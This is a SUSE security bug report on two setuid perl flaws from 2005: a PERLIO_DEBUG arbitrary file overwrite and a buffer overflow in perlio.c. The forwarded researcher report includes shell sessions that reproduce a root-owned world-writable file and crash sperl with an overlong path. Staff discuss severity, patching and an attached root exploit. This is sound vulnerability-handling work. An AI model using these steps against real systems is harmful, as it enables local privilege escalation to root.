Bug 65354 (CVE-2005-0156)

Summary:	VUL-0: CVE-2005-0156: 2 setuid perl problems
Product:	[Novell Products] SUSE Security Incidents	Reporter:	Marcus Meissner <meissner>
Component:	Incidents	Assignee:	Michael Schröder <mls>
Status:	RESOLVED FIXED	QA Contact:	Security Team bot <security-team>
Severity:	Normal
Priority:	P3 - Medium	CC:	security-team
Version:	unspecified
Target Milestone:	---
Hardware:	All
OS:	Linux
Whiteboard:	CVE-2005-0156: CVSS v2 Base Score: 2.1 (AV:L/AC:L/Au:N/C:N/I:P/A:N)
Found By:	---	Services Priority:
Business Priority:		Blocker:	---
Marketing QA Status:	---	IT Deployment:	---
Attachments:	perl-5.8.6-bug33990.patch ex_perl2.c ex_perl2.c

Description Marcus Meissner 2005-02-01 00:51:35 UTC

From: "KF (Lists)" <kf_lists@digitalmunition.com>                                
To: nick@ccl4.org, larry@wall.org, vendor-sec@lst.de                             
Subject: [vendor-sec] [Fwd: setuid perl security issues]                         
                                                                                 
[-- Attachment #1 [details] --]                                                            
[-- Type: text/plain, Encoding: 7bit, Size: 0.1K --]                             
                                                                                 
Excuse the poorly written description... I wrote it at 3am last night.           
                                                                                 
This was also sent to perlbug@perl.org                                           
-KF                                                                              
                                                                                 
[-- Attachment #2 [details]: setuid perl security issues --]                               
[-- Type: message/rfc822, Encoding: 7bit, Size: 7.0K --]                         
                                                                                 
From: "KF (Lists)" <kf_lists@digitalmunition.com>                                
To:  perlbug@perl.org                                                            
Subject: setuid perl security issues                                             
                                                                                 
[-- Attachment #1 [details] --]                                                            
[-- Type: text/plain, Encoding: 7bit, Size: 0K --]                               
                                                                                 
                                                                                 
[-- Attachment #2 [details]: setuid_perl.txt --]                                           
[-- Type: text/plain, Encoding: 7bit, Size: 2.2K --]                             
                                                                                 
PERLIO_DEBUG                                                                     
If set to the name of a file or device then certain operations of PerlIO         
sub-system will be logged to that file (opened as append). Typical uses          
are UNIX:                                                                        
                                                                                 
./perlio.c:                                                                      
void                                                                             
PerlIO_debug(const char *fmt, ...)                                               
{                                                                                
...                                                                              
    if (!dbg) {                                                                  
        char *s = PerlEnv_getenv("PERLIO_DEBUG");                                
        if (s && *s)                                                             
            dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666);         
        else                                                                     
            dbg = -1;                                                            
    }                                                                            
                                                                                 
                                                                                 
If $ENV{'PERLIO_DEBUG'} is not set PerlIO_debug() is a no-op.                    
                                                                                 
else you can do the following either via sperl or vial sperl:                    
                                                                                 
sperl:                                                                           
kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4                                   
-rwsr-xr-x  1 root root 63808 2004-12-11 18:32 /usr/bin/sperl5.8.4               
kfinisterre@jdam:~$ export PERLIO_DEBUG=/tmp/aaa                                 
kfinisterre@jdam:~$ umask 001                                                    
kfinisterre@jdam:~$ /usr/bin/sperl5.8.4                                          
sperl needs fd script                                                            
You should not call sperl directly; do you need to change a #! line              
from sperl to perl?                                                              
kfinisterre@jdam:~$ ls -al /tmp/aaa                                              
-rw-rw-rw-  1 root kfinisterre 1403 2005-01-30 02:34 /tmp/aaa                    
                                                                                 
setuid wrapper:                                                                  
kfinisterre@jdam:/tmp$ ls -al /usr/sbin/mooix-pty-helper                         
/usr/sbin/mooregister /usr/sbin/moopasswd                                        
-rwsr-xr-x  1 root root 2872 2003-11-20 15:28/usr/sbin/mooix-pty-helperc         
-rwsr-xr-x  1 root root 2832 2003-11-20 15:28 /usr/sbin/moopasswd                
-rwsr-xr-x  1 root root 2836 2003-11-20 15:28 /usr/sbin/mooregister              
                                                                                 
These are all setuid programs that invoke perl scripts.                          
                                                                                 
/usr/share/mooix/mooix-pty-helper.pl                                             
/usr/share/mooix/moopasswd.pl                                                    
/usr/share/mooix/mooregister.pl                                                  
                                                                                 
kfinisterre@jdam:/tmp$ umask 001                                                 
kfinisterre@jdam:/tmp$ export PERLIO_DEBUG=/tmp/oops2                            
kfinisterre@jdam:/tmp$ /usr/sbin/mooix-pty-helper                                
need a session dir at /usr/share/mooix/mooix-pty-helper.pl line 22,              
<CONFIG> line 98.                                                                
kfinisterre@jdam:/tmp$ ls -al /tmp/oops2                                         
-rw-rw-rw-  1 root kfinisterre 30285 2005-01-30 02:23 /tmp/oops2                 
                                                                                 
kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3                                      
/usr/share/mooix/mooix-pty-helper.pl:0 fd 0 refcnt=0                             
/usr/share/mooix/mooix-pty-helper.pl:0 fd 1 refcnt=0                             
/usr/share/mooix/mooix-pty-helper.pl:0 fd 2 refcnt=0                             
                                                                                 
kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2                                     
                                                                                 
hrmmm...                                                                         
kfinisterre@jdam:~$ ls -al /etc/ld.so.preload                                    
ls: /etc/ld.so.preload: No such file or directory                                
                                                                                 
gonna try to write an ld.so.preload exploit without trashing my box. hehe. fun   
+time.                                                                           
                                        [-- Attachment #3 [details]: 
setuid_perl_overflow.txt --]                                  
[-- Type: text/plain, Encoding: quoted-printable, Size: 3.8K --]                 
                                                                                 
While looking at the source code to figure out what the details of my            
+PERLIO_DEBUG file overwrite bug                                                 
I also found a buffer overflow...                                                
                                                                                 
in perlio.c:                                                                     
                                                                                 
   if (dbg > 0) {                                                                
        dTHX;                                                                    
#ifdef USE_ITHREADS                                                              
        /* Use fixed buffer as sv_catpvf etc. needs SVs */                       
        char buffer[1024];                                                       
        char *s;                                                                 
        STRLEN len;                                                              
        s = CopFILE(PL_curcop);                                                  
        if (!s)                                                                  
            s = "(none)";                                                        
        sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));            
                                                                                 
Set PERLIO_DEBUG to anything      
                           make a perl script calling sperl and run it with 
the full path (after placing it 
+in a long ass directory)                                                        
                                                                                 
#!/usr/bin/sperl5.8.4                                                            
print a;                                                                         
                                                                                 
                                                                                 
kfinisterre@jdam:/tmp$                                                           
+/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+A/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.pl                                    
Segmentation fault                                                               
                                                                                 
                                                                                 
                                                                                 
 stat64("/usr/local/share/perl/5.8.0", 0xbfffd880) = -1 ENOENT (No such file 
or  
+directory)                                                                      
** eip[40175563] eax[ffffffda] ecx[00008441] edx[000001b6] ebx[080677ad]         
+esp[bfffd294] ebp[bfffd2a8] esi[00008441] edi[40177d00]                         
 open("/tmp/lala", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 3              
** eip[4021898a] eax[00000000] ecx[08054e04] edx[bfffcd9c] ebx[402e95e0]         
+esp[bfffcbc8] ebp[bfffcbe0] esi[41414141] edi[bfffcd9c]                         
 --- SIGSEGV (Segmentation fault) @ 0 (0) ---                                    
upeek: ptrace(PTRACE_PEEKUSER,2970,48,0): No such process

Comment 1 Marcus Meissner 2005-02-01 00:51:35 UTC

<!-- SBZ_reproduce  -->
see above.

Comment 2 Marcus Meissner 2005-02-01 00:52:12 UTC

its unclear if these really exist. 
 
issue is not public yet.

Comment 3 Michael Schröder 2005-02-01 01:04:06 UTC

Yes, I already saw this on perlbug. Fortunatelly we don't ship a suid-root
perl... Dunno if we should fix this for old distris...

Comment 4 Marcus Meissner 2005-02-01 01:13:02 UTC

in this case this issue can be considered public.

Comment 5 Marcus Meissner 2005-02-01 01:15:50 UTC

I would prefer it fixed for all distros. 
 
The user might always make perl setuid root.

Comment 6 Marcus Meissner 2005-02-01 01:16:39 UTC

move to suselinux (away from securityinternal)

Comment 7 Thomas Biege 2005-02-01 11:48:56 UTC

 CAN-2005-0155

Comment 8 Marcus Meissner 2005-02-01 17:24:13 UTC

master swampid: 279

Comment 9 Marcus Meissner 2005-02-01 17:26:24 UTC

Use CAN-2005-0155 for the privilege escalation in debug mode                     
Use CAN-2005-0156 for the buffer overflow

Comment 10 Marcus Meissner 2005-02-01 17:27:37 UTC

Created attachment 28090 [details]
perl-5.8.6-bug33990.patch

patch from Mandrake for both issues.

Comment 11 Michael Schröder 2005-02-01 18:24:23 UTC

Yeah yeah, of course I already had the patch.

Comment 12 Michael Schröder 2005-02-01 18:24:53 UTC

And the buffer overflow is a non issue.

Comment 13 Marcus Meissner 2005-02-02 19:48:44 UTC

Created attachment 28127 [details]
ex_perl2.c

the "non issue" sample root exploit.

Comment 14 Marcus Meissner 2005-02-02 19:52:13 UTC

i could at least reproduce it segfaulting .... so there is an issue.

Comment 15 Michael Schröder 2005-02-02 20:48:13 UTC

No, it's not an issue. It's in the PERLIO_DEBUG which can be used to overwrite
arbitrary files anyway, so the overflow doesn't make things worse...

Comment 16 Michael Schröder 2005-02-04 23:14:05 UTC

packages submitted...

Comment 17 Marcus Meissner 2005-02-10 21:02:03 UTC

Created attachment 28387 [details]
ex_perl2.c

ex_perl2.c with bugs fixed ...

Comment 18 Marcus Meissner 2005-02-10 22:06:22 UTC

updates released.

Comment 19 Thomas Biege 2009-10-13 21:01:57 UTC

CVE-2005-0156: CVSS v2 Base Score: 2.1 (AV:L/AC:L/Au:N/C:N/I:P/A:N)